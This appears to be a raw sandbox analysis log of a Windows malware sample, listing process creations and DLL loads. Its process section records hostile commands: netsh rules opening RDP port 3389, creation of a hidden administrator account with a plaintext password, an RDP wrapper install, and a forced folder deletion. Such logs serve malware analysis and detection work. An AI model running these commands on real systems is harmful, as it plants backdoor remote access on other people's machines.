Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBGIJEGCGDG.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userAFHDHCAAKE.exe "C:\Users\userAFHDHCAAKE.exe"	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKFHCGIDBA.exe "C:\ProgramData\BKFHCGIDBA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKJJEBKKEH.exe "C:\ProgramData\BKJJEBKKEH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIEBGIIJDG.exe "C:\ProgramData\GIEBGIIJDG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBAFBGIDHCB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGCAEHDBAAE.exe "C:\Users\userGCAEHDBAAE.exe"
Source: C:\Users\userGCAEHDBAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userBGIJEGCGDG.exe "C:\Users\userBGIJEGCGDG.exe"
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Users\userBGIJEGCGDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_615fbfde V24hFLzx4jqu /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_615fbfde /add
Source: C:\ProgramData\BKFHCGIDBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\BKJJEBKKEH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GIEBGIIJDG.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Section loaded: mscoree.dll
Source: C:\Users\userGCAEHDBAAE.exe	Section loaded: apphelp.dll
Source: C:\Users\userGCAEHDBAAE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userGCAEHDBAAE.exe	Section loaded: version.dll
Source: C:\Users\userGCAEHDBAAE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userGCAEHDBAAE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: mscoree.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: apphelp.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: version.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: cryptsp.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: rsaenh.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: cryptbase.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: wldp.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: amsi.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: userenv.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: profapi.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: msasn1.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: gpapi.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: windows.storage.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: rasapi32.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: rasman.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: rtutils.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: mswsock.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: winhttp.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: iphlpapi.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: dnsapi.dll
Source: C:\Users\userBGIJEGCGDG.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
